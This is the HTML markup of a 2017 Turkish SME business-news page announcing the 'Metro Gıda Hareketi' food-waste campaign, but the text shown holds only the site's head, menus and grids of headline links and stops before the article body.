﻿<!DOCTYPE html>
<html lang="tr">
  <head>
        <title>‘Metro Gıda Hareketi’ başladı</title>
    <meta charset="utf-8">
    <!--meta name="viewport" content="width=device-width, initial-scale=1.0"-->
    <meta name="description" content="Türkiye&#039;de her yıl üretilen 49 milyon ton meyve ve sebzenin yüzde 25 ila 40&#039;ı arasında değişen miktarı üretim ve dağıtım zinciri aşamasında">
    <meta name="keywords" content="Metro Gıda, metro, TÜBİTAK, Metro Toptancı Market, Kubilay Özerkan">
    <meta property="fb:admins" content="">
        <meta property="og:site_name" content="‘Metro Gıda Hareketi’ başladı">
    <meta property="og:title" content="‘Metro Gıda Hareketi’ başladı">
    <meta property="og:description" content="Türkiye&#039;de her yıl üretilen 49 milyon ton meyve ve sebzenin yüzde 25 ila 40&#039;ı arasında değişen miktarı üretim ve dağıtım zinciri aşamasında"> 
    <meta property="og:url" content="http://www.kobi-efor.com.tr/panorama/metro-gida-hareketi-basladi-h6374.html">
    <meta property="og:image" content="http://www.kobi-efor.com.tr/images/haberler/metro_gida_hareketi_basladi_h6374_9dd00.jpg">    <meta property="og:type" content="article">
        <meta http-equiv="refresh" content="600">    <meta name="twitter:card" content="summary_large_image">        <meta name="twitter:url" content="http://www.kobi-efor.com.tr/panorama/metro-gida-hareketi-basladi-h6374.html">
    <meta name="twitter:domain" content="http://www.kobi-efor.com.tr/">
    <meta name="twitter:site" content="">
    <meta name="twitter:title" content="‘Metro Gıda Hareketi’ başladı">    <meta name="twitter:description" content="Türkiye’de her yıl üretilen 49 milyon ton meyve ve sebzenin yüzde 25 ila 40’ı arasında değişen miktarı  üretim ve dağıtım zinciri aşamasında kayba uğruyor.">
    <meta name="twitter:image:src" content="http://www.kobi-efor.com.tr/images/haberler/metro_gida_hareketi_basladi_h6374_9dd00.jpg">        <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/base.min.css" rel="stylesheet">
    <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/icons.css" rel="stylesheet">
    <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/style.css" rel="stylesheet">
    <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/hs.css" rel="stylesheet">
   
        <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/print.css" rel="stylesheet" media="print, handheld">    <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.kobi-efor.com.tr/rss.php" />
    <link rel="shortcut icon" href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/images/favicon.ico">
    <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&subset=latin,latin-ext" rel="stylesheet" type="text/css">
    <link rel="canonical" href="http://www.kobi-efor.com.tr/panorama/metro-gida-hareketi-basladi-h6374.html">

     

    <!--[if gte IE 9]>
    <style type="text/css">
        .gradient {
            filter: none;
        }
    </style>
    <![endif]-->
    <!--[if IE 7]>
    <style type="text/css">
        .reklam.dikey.sol .fixed {
            margin-left:-px;
        }
    </style>
    <![endif]-->

    <script type="text/javascript">
    var site_url   = 'http://www.kobi-efor.com.tr/';
    var tema       = 'hs-vertigo';
    var theme_path = 'http://www.kobi-efor.com.tr/_themes/hs-vertigo/';
    var ajax_url   = '_ajax/';
    var cat_limit  = '10';
    var poll_voted = '';    var comment_approved = '0';
    var doviz    = '1';
    var lazyload = '1';
    var twitter_user  = '';
    var facebook_user = 'KobiEfor';
    var popup_saat = '1';
    var arkaplan_link = '';    var hava   = '1';
    var hava_default   = 'TUXX0014';
    var namaz   = '1';
    var namaz_default   = 'istanbul';
    var superlig   = '0';

        </script>

        <!-- GOOGLE ANALITIK -->
    <script type="text/javascript">
    	var _gaq = _gaq || [];
    	_gaq.push(['_setAccount', 'UA-26224214-1']);
    	_gaq.push(['_trackPageview']);
    </script>
    <!-- GOOGLE ANALITIK -->
    

    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
      </head>
  <body >



      <div class="container center shadow">
        <div class="header">
          <div id="ustkisim" class="row">
          ﻿<!-- UST REKLAM-MENU -->
        <div id="reklammenu" class="span12">
                    <div class="row-fluid">
            <div class="span12">
              <div class="ustmenu">
                <a href="http://www.kobi-efor.com.tr/m/" title="Mobil"><i class="halflings-icon phone"></i> Mobil</a>
                <a href="http://www.kobi-efor.com.tr/kunye.html" title="Künye"><i class="halflings-icon link"></i> Künye</a>
                <a href="http://www.kobi-efor.com.tr/sitene-ekle.html"><i class="halflings-icon plus-sign"></i> Sitene Ekle</a>
                <a href="http://www.kobi-efor.com.tr/iletisim.html" title="İletişim" class="last"><i class="halflings-icon envelope"></i> İletişim</a>

                <div id="memberArea" class="pull-right"></div>
              
              </div>
            </div>
          </div>
        </div>
<!-- UST REKLAM-MENU ***************************************************** -->
<!-- LOGO REKLAM ALANI -->
        <div id="logo" class="span12">
          <div class="row-fluid">
            <div class="span3">
              <h1 class="logo"><a href="http://www.kobi-efor.com.tr/" class="logo"><img src="http://www.kobi-efor.com.tr/images/banner/kobiefor_logo_190x87png.png" alt="‘Metro Gıda Hareketi’ başladı" /></a></h1>
            </div>
            <div class="span9">
            <div class="row-fluid">
            <div class="reklam" style="margin-left: -15px;"><a href="http://www.kobi-efor.com.tr/banner.php?id=194" target="_blank" rel="nofollow"><img src="http://www.kobi-efor.com.tr/images/banner/13-kobi-zirvesi-768x90.gif" width="768" height="90" style="width:768px;height: 90px;border:0" alt="banner194" /></a></div>            </div>
            <div class="row-fluid line">
              <span><i class="halflings-icon time"></i> 18 Mayıs 2017 Perşembe</span>
              <a href="http://facebook.com/KobiEfor" target="_blank" title="Facebook Sayfamız"><i class="social-icon social-fb"></i> Facebook</a>
              <a href="http://twitter.com/" target="_blank" title="Twitter Sayfamız"><i class="social-icon social-tw"></i> Twitter</a>
              <a href="" target="_blank" title="Google Plus Sayfamız"><i class="social-icon social-gl"></i> Google</a>
              <a href="http://www.kobi-efor.com.tr/rss.php" target="_blank" title="RSS Servisi"><i class="social-icon social-rss"></i> RSS</a>
            </div>
            </div>
                      </div>
        </div>
<!-- LOGO REKLAM ALANI ***************************************************** -->
<!-- MENU -->
        <div id="menu" class="span12">
          <div class="row-fluid">
              <div class="anamenu span12">
              <form action="http://www.kobi-efor.com.tr/" method="get" class="pull-right">
                  <input type="hidden" name="m" value="arama">
                  <input type="text" name="q" placeholder="Haber yada kelime ara...">
                  <input type="hidden" name="auth" value="a747abd1352874afb793d4af04beeb11421e221c" />
                  <button class="btn btn-link" type="submit"><i class="halflings-icon white search"></i></button>
              </form>
              <a href="http://www.kobi-efor.com.tr/" class="current darken">&nbsp;<i class="halflings-icon white home"></i>&nbsp;Ana Sayfa</a>
                <a href="http://www.kobi-efor.com.tr/hakkimizda-s4.html"> Hakkımızda</a>
                <a href="http://www.kobi-efor.com.tr/about-us-s5.html"> About Us</a>
                <a href="http://www.kobi-efor.com.tr/galeri/" class="blue"><i class="halflings-icon white picture"></i> Foto Galeri</a>
                <a href="http://www.kobi-efor.com.tr/webtv/" class="yellow"><i class="halflings-icon white film"></i> Web TV</a>
                <a href="http://www.kobi-efor.com.tr/edergi/oku/2017/5/" target="_blank"><i class="halflings-icon white book"></i> E-Dergi</a>
                <a href="http://www.kobi-efor.com.tr/edergi/" target="_blank"><i class="halflings-icon white folder-open"></i> Arşiv</a>
                <!--a href="http://www.kobi-efor.com.tr/biyografiler.html" class=""><i class="halflings-icon white book"></i> Biyografiler</a-->
                

            </div>
          </div>
            <div class="row-fluid sticky-menu">
                              <div class="kategori">
                <a href="http://www.kobi-efor.com.tr/" class="home">&nbsp;<i class="halflings-icon white home"></i>&nbsp;</a>                 
                                  <a title="KAPAK" href="http://www.kobi-efor.com.tr/kapak" id="k1"    >KAPAK</a>
<a title="ETKİNLİK" href="http://www.kobi-efor.com.tr/etkinlik" id="k38"    >ETKİNLİK</a>
<a title="SÖYLEŞİ" href="http://www.kobi-efor.com.tr/soylesi" id="k37"    >SÖYLEŞİ</a>
<a title="OSB" href="http://www.kobi-efor.com.tr/osb" id="k2"    >OSB</a>
<a title="SEKTÖR" href="http://www.kobi-efor.com.tr/sektor" id="k3"    >SEKTÖR</a>
<a title="ÜLKE" href="http://www.kobi-efor.com.tr/ulke" id="k5"    >ÜLKE</a>
<a title="AKADEMİ" href="http://www.kobi-efor.com.tr/akademi" id="k44"    >AKADEMİ</a>
<a title="DESTEK-TEŞVİK" href="http://www.kobi-efor.com.tr/destek-tesvik" id="k45"    >DESTEK-TEŞVİK</a>
<a title="YAŞAM" href="http://www.kobi-efor.com.tr/yasam" id="k47"    >YAŞAM</a>
<a title="HABERLER" href="http://www.kobi-efor.com.tr/haberler" id="k46"    >HABERLER</a>
<div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">Tüm Kategoriler</a></div> 
                                              <form action="http://www.kobi-efor.com.tr/" method="get" class="pull-right">
                  <input type="hidden" name="m" value="arama">
                  <input type="text" name="q" placeholder="Haber yada kelime ara...">
                  <input type="hidden" name="auth" value="a747abd1352874afb793d4af04beeb11421e221c" />
                  <button class="btn btn-link" type="submit"><i class="halflings-icon white search"></i></button>
              </form>
                </div>
                <div class="othercat">
                  <div class="inner">
                    <div class="clearfix">
                    
                    </div>
                  </div>
                </div>
                                          
           
          <div id="katicerik" class="row-fluid"><div class="katelement kat_k1">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/kapak/20-avrasya-ekonomi-zirvesi-istanbulda-yapildi-h6271.html" title="20. Avrasya Ekonomi Zirvesi, İstanbulda yapıldı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/20_avrasya_ekonomi_zirvesi_istanbul_da_yapildi_h6271_37d3d.jpg" alt="20. Avrasya Ekonomi Zirvesi, İstanbulda yapıldı" />
<b>20. Avrasya Ekonomi Zirvesi, İstanbul’da yapıldı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/20-avrasya-ekonomi-zirvesi-4-6-nisan-2017de-istanbulda-h6195.html" title="20. Avrasya Ekonomi Zirvesi 4-6 Nisan 2017de İstanbulda"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/20_avrasya_ekonomi_zirvesi_4_6_nisan_2017de_istanbulda_h6195_5f739.jpg" alt="20. Avrasya Ekonomi Zirvesi 4-6 Nisan 2017de İstanbulda" />
<b>20. Avrasya Ekonomi Zirvesi 4-6 Nisan 2017’de İstanbul’da</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/tobb-turkiye-ekonomi-surasi-acil-gundem-istihdam-h6123.html" title="TOBB Türkiye Ekonomi Şurası; ACİL GÜNDEM İSTİHDAM"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tobb_turkiye_ekonomi_surasi_acil_gundem_istihdam_h6123_aa9f7.png" alt="TOBB Türkiye Ekonomi Şurası; ACİL GÜNDEM İSTİHDAM" />
<b>TOBB Türkiye Ekonomi Şurası; ACİL GÜNDEM İSTİHDAM</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/kapak/2017de-ekonomik-yukselise-yeni-bir-kaldirac-gumruk-birligi-reformu-h6006.html" title="2017de ekonomik yükselişe yeni bir ‘kaldıraç; GÜMRÜK BİRLİĞİ REFORMU"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/2017de_ekonomik_yukselise_yeni_bir_kaldirac_gumruk_birligi_reformu_h6006_e0389.png" alt="2017de ekonomik yükselişe yeni bir ‘kaldıraç; GÜMRÜK BİRLİĞİ REFORMU" />
<b>2017’de ekonomik yükselişe yeni bir ‘kaldıraç’; GÜMRÜK BİRLİĞİ REFORMU</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/2017-yili-ekonomik-buyume-stratejisi-uretime-yatirim-h5922.html" title="2017 Yılı Ekonomik Büyüme Stratejisi: ÜRETİME YATIRIM"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/2017_yili_ekonomik_buyume_stratejisi_uretime_yatirim_h5922_5c490.png" alt="2017 Yılı Ekonomik Büyüme Stratejisi: ÜRETİME YATIRIM" />
<b>2017 Yılı Ekonomik Büyüme Stratejisi: ÜRETİME YATIRIM</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/yatirim-ve-istihdama-cozum-kobi-destekleri-h5842.html" title="Yatırım ve istihdama çözüm; KOBİ DESTEKLERİ"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yatirim_ve_istihdama_cozum_kobi_destekleri_h5842_e3b78.png" alt="Yatırım ve istihdama çözüm; KOBİ DESTEKLERİ" />
<b>Yatırım ve istihdama çözüm; KOBİ DESTEKLERİ</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/kapak/basbakan-binali-yildirim-yeni-orta-vadeli-programi-acikladi-isimiz-kis-bahtimiz-yaz-h5730.html" title="Başbakan Binali Yıldırım Yeni Orta Vadeli Programı açıkladı: ‘İŞİMİZ ‘KIŞ BAHTIMIZ ‘YAZ!"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/basbakan_binali_yildirim_yeni_orta_vadeli_programi_acikladi_h5730_623e2.png" alt="Başbakan Binali Yıldırım Yeni Orta Vadeli Programı açıkladı: ‘İŞİMİZ ‘KIŞ BAHTIMIZ ‘YAZ!" />
<b>Başbakan Binali Yıldırım Yeni Orta Vadeli Programı açıkladı: ‘İŞ’İMİZ ‘KIŞ’ BAHTIMIZ ‘YAZ’!</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/bilim-sanayi-ve-teknoloji-bakani-faruk-ozlu-h5635.html" title="Bilim, Sanayi ve Teknoloji Bakanı Faruk Özlü"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/uretim_reformu_h5635_8a82b.png" alt="Bilim, Sanayi ve Teknoloji Bakanı Faruk Özlü" />
<b>Bilim, Sanayi ve Teknoloji Bakanı Faruk Özlü</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/ekonomide-seferberlik-zamani-haydi-yatirim-ve-uretime-h5569.html" title="Ekonomide seferberlik zamanı: HAYDİ YATIRIM VE ÜRETİME"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ekonomide_seferberlik_zamani_haydi_yatirim_ve_uretime_h5569_a8bd4.png" alt="Ekonomide seferberlik zamanı: HAYDİ YATIRIM VE ÜRETİME" />
<b>Ekonomide seferberlik zamanı: HAYDİ YATIRIM VE ÜRETİME</b></a>
</div>
</div></div><div class="katelement kat_k38">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/etkinlik/hatay-kobilerine-finansal-enformasyon-h5844.html" title="Hatay KOBİlerine finansal enformasyon"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/hatay_kobi_lerine_finansal_enformasyon_h5844_7a0b2.png" alt="Hatay KOBİlerine finansal enformasyon" />
<b>Hatay KOBİ’lerine finansal enformasyon</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/finans-kulup-gencler-ve-kobilerle-bulusuyor-h5150.html" title="Finans Kulüp gençler ve KOBİlerle buluşuyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/finans_kulup_gencler_ve_kobilerle_bulusuyor_h5150_04101.png" alt="Finans Kulüp gençler ve KOBİlerle buluşuyor" />
<b>Finans Kulüp gençler ve KOBİ’lerle buluşuyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/turkiye-inovasyon-haftasi-3-gunde-50-bin-kisiyi-bulusturdu-h4840.html" title="‘Türkiye İnovasyon Haftası 3 günde 50 bin kişiyi buluşturdu"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiye_inovasyon_haftasi_3_gunde_50_bin_kisiyi_bulusturdu_h4840_08d3d.png" alt="‘Türkiye İnovasyon Haftası 3 günde 50 bin kişiyi buluşturdu" />
<b>‘Türkiye İnovasyon Haftası’ 3 günde 50 bin kişiyi buluşturdu</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/etkinlik/tbd-32-ulusal-bilisim-kurultayi-ve-2-ankara-bilisim-fuari-h4847.html" title="TBD 32. Ulusal Bilişim Kurultayı ve 2. Ankara Bilişim Fuarı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tbd_32_ulusal_bilisim_kurultayi_ve_2_ankara_bilisim_fuari_bilisim_2015citex_2015_h4847_125e6.png" alt="TBD 32. Ulusal Bilişim Kurultayı ve 2. Ankara Bilişim Fuarı" />
<b>TBD 32. Ulusal Bilişim Kurultayı ve 2. Ankara Bilişim Fuarı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/tosyov-samsunlu-kadin-girisimcileri-egitti-bilincli-kadin-girisimciler-artacak-h4844.html" title="TOSYÖV, Samsunlu kadın girişimcileri eğitti: Bilinçli kadın girişimciler artacak."><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tosyov_samsunlu_kadin_girisimcileri_egitti_bilincli_kadin_girisimciler_artacak_h4844_b22e9.png" alt="TOSYÖV, Samsunlu kadın girişimcileri eğitti: Bilinçli kadın girişimciler artacak." />
<b>TOSYÖV, Samsunlu kadın girişimcileri eğitti: Bilinçli kadın girişimciler artacak.</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/4-kobi-ve-girisimcilik-odulleri-h4854.html" title="4. KOBİ ve Girişimcilik Ödülleri"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/4_kobi_ve_girisimcilik_odulleri_h4854_5b8a5.png" alt="4. KOBİ ve Girişimcilik Ödülleri" />
<b>4. KOBİ ve Girişimcilik Ödülleri</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/etkinlik/6-bogazici-zirvesi-80-ulkenin-siyasilerini-bulusturdu-daha-az-yoksulluk-daha-fazla-refah-h4856.html" title="6. Boğaziçi Zirvesi, 80 ülkenin siyasilerini buluşturdu. Daha az yoksulluk, daha fazla refah”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/6_bogazici_zirvesi_80_ulkenin_siyasilerini_bulusturdu_daha_az_yoksulluk_daha_fazla_refah_h4856_254da.png" alt="6. Boğaziçi Zirvesi, 80 ülkenin siyasilerini buluşturdu. Daha az yoksulluk, daha fazla refah”" />
<b>6. Boğaziçi Zirvesi, 80 ülkenin siyasilerini buluşturdu. “Daha az yoksulluk, daha fazla refah”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/toplam-95-milyar-dolar-ihracat-yaptilar-metal-sektorun-ihracat-yildizlari-odullerini-aldi-h4859.html" title="Toplam 9.5 milyar dolar ihracat yaptılar. Metal sektörün ihracat yıldızları, ödüllerini aldı."><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/toplam_95_milyar_dolar_ihracat_yaptilar_metal_sektorun_ihracat_yildizlari_odullerini_aldi_h4859_0cd96.png" alt="Toplam 9.5 milyar dolar ihracat yaptılar. Metal sektörün ihracat yıldızları, ödüllerini aldı." />
<b>Toplam 9.5 milyar dolar ihracat yaptılar. Metal sektörün ihracat yıldızları, ödüllerini aldı.</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/kalder-ve-tusiad-23-kez-kaliteyi-odullendirdi-mukemmelligi-surdurmek-h4694.html" title="KalDer ve TÜSİAD 23. kez kaliteyi ödüllendirdi: Mükemmelliği Sürdürmek”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kalder_ve_tusiad_23_kez_kaliteyi_odullendirdi_mukemmelligi_surdurmek_h4694_abd7d.png" alt="KalDer ve TÜSİAD 23. kez kaliteyi ödüllendirdi: Mükemmelliği Sürdürmek”" />
<b>KalDer ve TÜSİAD 23. kez kaliteyi ödüllendirdi: “Mükemmelliği Sürdürmek”</b></a>
</div>
</div></div><div class="katelement kat_k37">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/ayin-konugu/tesvikli-bingolden-cagri-var-potansiyel-var-yatirima-gel-h6272.html" title="Teşvikli Bingölden çağrı var; Potansiyel var yatırıma gel”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/bingol_valisi_yavuz_selim_kosger_h6272_ef0dc.jpg" alt="Teşvikli Bingölden çağrı var; Potansiyel var yatırıma gel”" />
<b>Teşvikli Bingöl’den çağrı var; “Potansiyel var yatırıma gel”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/ekonomist/ekonomist-prof-dr-korkut-boratav-h6285.html" title="Ekonomist Prof. Dr. Korkut Boratav"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ekonomist_prof_dr_korkut_boratav_h6285_9c063.jpg" alt="Ekonomist Prof. Dr. Korkut Boratav" />
<b>Ekonomist Prof. Dr. Korkut Boratav</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/finans/fibabanka-sektorun-2-kati-buyudu-2017-de-saglik-egitim-tarim-kobi-leri-ile-ihracatci-isletmelere-odaklandi-h6283.html" title="Fibabanka sektörün 2 katı büyüdü, 2017#039;de; sağlık, eğitim, tarım KOBİ#039;leri ile ihracatçı işletmelere odaklandı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/fibabanka_sektorun_2_kati_buyudu_2017_de_saglik_egitim_tarim_kobi_leri_ile_ihracatci_isletmelere_odaklandi_h6283_3fb11.jpg" alt="Fibabanka sektörün 2 katı büyüdü, 2017#039;de; sağlık, eğitim, tarım KOBİ#039;leri ile ihracatçı işletmelere odaklandı" />
<b>Fibabanka sektörün 2 katı büyüdü, 2017&#039;de; sağlık, eğitim, tarım KOBİ&#039;leri ile ihracatçı işletmelere odaklandı</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/ajans/dijitalle-nakavt-eden-ajans-kogital-gelecek-teknolojiyi-yakalayabilenlerin-olacaktir-h6286.html" title="Dijitalle nakavt eden ajans; Kogital: Gelecek teknolojiyi yakalayabilenlerin olacaktır”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/dijitalle_nakavt_eden_ajans_kogital_h6286_d71d3.jpg" alt="Dijitalle nakavt eden ajans; Kogital: Gelecek teknolojiyi yakalayabilenlerin olacaktır”" />
<b>Dijitalle nakavt eden ajans; Kogital: “Gelecek teknolojiyi yakalayabilenlerin olacaktır”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/finans/qnb-finansleasing-genel-muduru-metin-karabiber-pazar-payimiz-yuzde-7ye-ulasir-h6199.html" title="QNB Finansleasing Genel Müdürü Metin Karabiber: Pazar payımız yüzde 7ye ulaşır”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/qnb_finansleasing_genel_muduru_metin_karabiber_pazar_payimiz_yuzde_7ye_ulasir_h6199_e932e.jpg" alt="QNB Finansleasing Genel Müdürü Metin Karabiber: Pazar payımız yüzde 7ye ulaşır”" />
<b>QNB Finansleasing Genel Müdürü Metin Karabiber: “Pazar payımız yüzde 7’ye ulaşır”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/ceo/fleetcorp-ceosu-dr-barbaros-citmacinin-yasam-mottosu-calismak-yalniz-iyi-calismak-h6200.html" title="Fleetcorp CEOsu Dr. Barbaros Çıtmacının yaşam mottosu; Çalışmak, yalnız iyi çalışmak…”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/fleetcorp_ceosu_dr_barbaros_citmacinin_yasam_mottosu_calismak_yalniz_iyi_calismak_h6200_c3715.jpg" alt="Fleetcorp CEOsu Dr. Barbaros Çıtmacının yaşam mottosu; Çalışmak, yalnız iyi çalışmak…”" />
<b>Fleetcorp CEO’su Dr. Barbaros Çıtmacı’nın yaşam mottosu; “Çalışmak, yalnız iyi çalışmak…”</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/ekonomist/korumaci-politikalar-dunya-ticaretini-daraltacak-h6207.html" title="Korumacı politikalar dünya ticaretini daraltacak"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/korumaci_politikalar_dunya_ticaretini_daraltacak_h6207_cd3d7.jpg" alt="Korumacı politikalar dünya ticaretini daraltacak" />
<b>Korumacı politikalar dünya ticaretini daraltacak</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/ajans/tek-tikla-startup-ve-kobilerin-hizmetinde-turkiyenin-ilk-online-pr-magazasi-piar-dijital-h6211.html" title="Tek tıkla startup ve KOBİlerin hizmetinde; Türkiyenin ilk online PR mağazası Piar Dijital"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tek_tikla_startup_ve_kobilerin_hizmetinde_turkiyenin_ilk_online_pr_magazasi_piar_dijital_h6211_ba289.jpg" alt="Tek tıkla startup ve KOBİlerin hizmetinde; Türkiyenin ilk online PR mağazası Piar Dijital" />
<b>Tek tıkla startup ve KOBİ’lerin hizmetinde; Türkiye’nin ilk online PR mağazası Piar Dijital</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/ayin-konugu/mus-valisi-seddar-yavuz-laleler-diyari-mus-h6122.html" title="Muş Valisi Seddar Yavuz; Laleler Diyarı Muş”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/mus_valisi_seddar_yavuz_laleler_diyari_mus_h6122_70757.png" alt="Muş Valisi Seddar Yavuz; Laleler Diyarı Muş”" />
<b>Muş Valisi Seddar Yavuz; “Laleler Diyarı Muş”</b></a>
</div>
</div></div><div class="katelement kat_k2">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/osb-tanitim/gosb-teknopark-tan-sanayi-camiasina-rekabet-dopingi-h6275.html" title="GOSB Teknopark#039;tan sanayi camiasına rekabet dopingi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/gosb_teknopark_h6275_fa278.jpg" alt="GOSB Teknopark#039;tan sanayi camiasına rekabet dopingi" />
<b>GOSB Teknopark&#039;tan sanayi camiasına rekabet dopingi</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/kayseri-osb-uretim-ivme-kazandi-h6329.html" title="Kayseri OSB: Üretim ivme kazandı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kayseri_osb_uretim_ivme_kazandi_h6329_26597.jpg" alt="Kayseri OSB: Üretim ivme kazandı" />
<b>Kayseri OSB: Üretim ivme kazandı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/antalya-osb-kazakistan-ta-60-firma-ile-gorustu-h6328.html" title="Antalya OSB Kazakistan#039;ta 60 firma ile görüştü"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/antalya_osb_kazakistan_ta_60_firma_ile_gorustu_h6328_bca06.jpg" alt="Antalya OSB Kazakistan#039;ta 60 firma ile görüştü" />
<b>Antalya OSB Kazakistan&#039;ta 60 firma ile görüştü</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/kars-osbye-lojistik-merkez-destegi-h6330.html" title="Kars OSBye lojistik merkez desteği"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kars_osbye_lojistik_merkez_destegi_h6330_8d1cd.jpg" alt="Kars OSBye lojistik merkez desteği" />
<b>Kars OSB’ye lojistik merkez desteği</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/kocaeli-istihdam-seferberliginde-hedef-yukseltti-h6315.html" title="Kocaeli İstihdam Seferberliğinde hedef yükseltti"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kocaeli_istihdam_seferberliginde_hedef_yukseltti_h6315_a2fbc.jpg" alt="Kocaeli İstihdam Seferberliğinde hedef yükseltti" />
<b>Kocaeli İstihdam Seferberliği’nde hedef yükseltti</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/hendek-2-osbde-stratejik-uretim-h6316.html" title="Hendek 2. OSBde stratejik üretim"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/hendek_2_osbde_stratejik_uretim_h6316_d16cf.jpg" alt="Hendek 2. OSBde stratejik üretim" />
<b>Hendek 2. OSB’de stratejik üretim</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/alman-uretici-saf-holland-turkiye-de-h6317.html" title="Alman üretici Saf-Holland, Türkiye#039;de"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/alman_uretici_saf_holland_turkiye_de_h6317_d3ec9.jpg" alt="Alman üretici Saf-Holland, Türkiye#039;de" />
<b>Alman üretici Saf-Holland, Türkiye&#039;de</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-tanitim/kabina-sigamayan-osb-marmaranin-parlayan-yildizi-sakarya-2-osb-h6209.html" title="Kabına sığamayan OSB; Marmaranın parlayan yıldızı; Sakarya 2. OSB"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kabina_sigamayan_osb_marmaranin_parlayan_yildizi_sakarya_2_osb_h6209_b4ec2.jpg" alt="Kabına sığamayan OSB; Marmaranın parlayan yıldızı; Sakarya 2. OSB" />
<b>Kabına sığamayan OSB; Marmara’nın parlayan yıldızı; Sakarya 2. OSB</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-den-haber/salihli-osbye-yatirimci-hucumu-h6222.html" title="Salihli OSBye yatırımcı hücumu"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/salihli_osbye_yatirimci_hucumu_h6222_2c59b.jpg" alt="Salihli OSBye yatırımcı hücumu" />
<b>Salihli OSB’ye yatırımcı hücumu</b></a>
</div>
</div></div><div class="katelement kat_k3">
<div class="span4"><div>
